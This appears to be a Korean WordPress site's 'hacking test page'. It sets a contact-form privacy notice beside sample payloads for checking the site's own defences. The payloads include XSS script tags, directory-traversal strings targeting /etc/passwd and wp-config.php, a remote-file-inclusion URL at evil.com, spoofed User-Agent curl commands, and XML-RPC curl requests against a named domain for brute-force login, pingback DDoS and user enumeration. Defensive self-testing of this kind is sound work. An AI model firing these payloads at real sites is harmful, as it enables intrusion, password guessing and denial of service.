해킹 테스트 페이지

문의 양식에 직접 입력해서 제출 하거나 아래에 있는 설명에서 왼쪽 버튼을 눌러 테스트 가능

    아니즈(이하 "회사")는 개인정보보호법, 정보통신망 이용촉진 및 정보보호 등에 관한 법률 등 관련 법령상의 개인정보보호 규정을 준수하며, 파트너의 개인정보 보호에 최선을 다하고 있습니다.

    1. 개인정보 수집 및 이용주체: 제휴문의 및 상담신청을 통해 제공하신 정보는 “회사”가 직접 접수하고 관리합니다.

    2. 동의를 거부할 권리 및 동의 거부에 따른 불이익: 신청자는 개인정보제공 등에 관해 동의하지 않을 권리가 있습니다.(이 경우 문의 및 상담신청이 불가능합니다.)

    3. 수집하는 개인정보 항목(필수항목): 담당자명, 담당자 이메일 주소, 담당자 전화번호

    4. 수집 및 이용목적: 제휴사 검토, 제휴사 관리시스템의 운용, 공지사항의 전달 등

    5. 보유기간 및 이용기간: 수집된 정보는 제휴문의 및 상담서비스가 종료되는 시점까지 보관됩니다.

    1. XSS (스크립트 삽입 공격)

    자바스크립트 등의 코드를 웹페이지에 삽입하여 사용자의 브라우저에서 실행시킴.

    <script>alert('XSS')</script>
    %3Cscript%3Ealert(1)%3C/script%3E

    2. Directory Traversal (디렉토리 수직이동 공격)

    상위 디렉토리로 이동해 서버의 민감한 파일을 열람하려는 공격.

    ../../../../etc/passwd
    file=../../../../wp-config.php

    3. 파일 포함 (LFI / RFI)

    서버 내부 또는 외부의 파일을 포함하여 악성 코드 실행을 유도함.

    http://evil.com/shell.txt
    template=../../../../wp-config.php

    4. User-Agent 조작

    브라우저가 아닌 도구를 가장하기 위해 요청 헤더의 User-Agent 값을 위조함.
    ※ 아래 명령어는 터미널(CMD 또는 bash)에서 실행해야 합니다.

    
curl -A "sqlmap" https://도메인
curl -A "Mozilla/5.0 (compatible; EvilBot/1.0)" https://도메인
curl -A "Mozilla/5.0 <script>alert(1)</script>" https://도메인

    5. XMLRPC 공격 예시

    ※ 터미널(curl)에서 실행해야 하며, 실서버에서 차단되어야 함.

    1️⃣ Brute Force
    2️⃣ Pingback DDoS
    3️⃣ 정보 수집
    curl -X POST https://yachtfit.kr/xmlrpc.php \ -H "Content-Type: text/xml" \ -d '<?xml version="1.0"?> <methodCall> <methodName>system.multicall</methodName> <params> <param> <value> <array> <data> <value> <struct> <member> <name>methodName</name> <value><string>wp.getUsersBlogs</string></value> </member> <member> <name>params</name> <value> <array> <data> <value> <array> <data> <value><string>admin</string></value> <value><string>wrongpass1</string></value> </data> </array> </value> </data> </array> </value> </member> </struct> </value> </data> </array> </value> </param> </params> </methodCall>'
    curl -X POST https://yachtfit.kr/xmlrpc.php \ -H "Content-Type: text/xml" \ -d '<?xml version="1.0"?> <methodCall> <methodName>pingback.ping</methodName> <params> <param> <value><string>http://target-site.com</string></value> </param> <param> <value><string>http://victim-site.com/post</string></value> </param> </params> </methodCall>'
    curl -X POST https://yachtfit.kr/xmlrpc.php \ -H "Content-Type: text/xml" \ -d '<?xml version="1.0"?> <methodCall> <methodName>wp.getUsersBlogs</methodName> <params> <param><value><string>admin</string></value></param> <param><value><string>wrongpassword</string></value></param> </params> </methodCall>'